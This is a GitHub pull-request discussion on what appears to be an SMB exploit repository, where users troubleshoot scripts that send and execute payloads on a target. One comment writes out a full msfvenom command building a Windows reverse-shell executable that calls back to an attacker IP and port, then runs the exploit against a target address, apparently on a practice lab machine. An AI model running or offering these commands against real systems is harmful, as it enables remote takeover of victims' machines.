Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Adding suport to custom tcp port #35

Open
wants to merge 5 commits into
base: master
Choose a base branch
from
Open

Adding suport to custom tcp port #35

wants to merge 5 commits into from

Conversation

helviojunior
Copy link

I added support to custom TCP port, it is very usefull in case of port fowarding and pivoting.

My Best Regards.

@helviojunior helviojunior reopened this Aug 7, 2018
@tlmyasirs
Copy link

tlmyasirs commented Nov 15, 2018
edited
Loading

I added a new file, based on zzz_exploit.py to send and execute an windows executable file

using zzz_exploit.py, victim >> pwned.txt created successfully
but using send_and_execute execution.py
Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done

@oriolmiranda
Copy link

I added a new file, based on zzz_exploit.py to send and execute an windows executable file

using zzz_exploit.py, victim >> pwned.txt created successfully but using send_and_execute execution.py Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done

Same error, has anyone solved it?

@purplebyteone
Copy link

Hey,

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.30 LPORT=8888 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.16.30_8888.exe

python send_and_execute.py 10.129.235.221 rev_10.10.16.30_8888.exe

Trying to connect to 10.129.235.221:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
Traceback (most recent call last):
File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 1077, in
exploit(target, port, pipe_name)
File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 839, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 615, in exploit_fish_barrel
conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)
File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 262, in send_trans
self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 258, in create_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str

How can I fix this?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@helviojunior @tlmyasirs @oriolmiranda @purplebyteone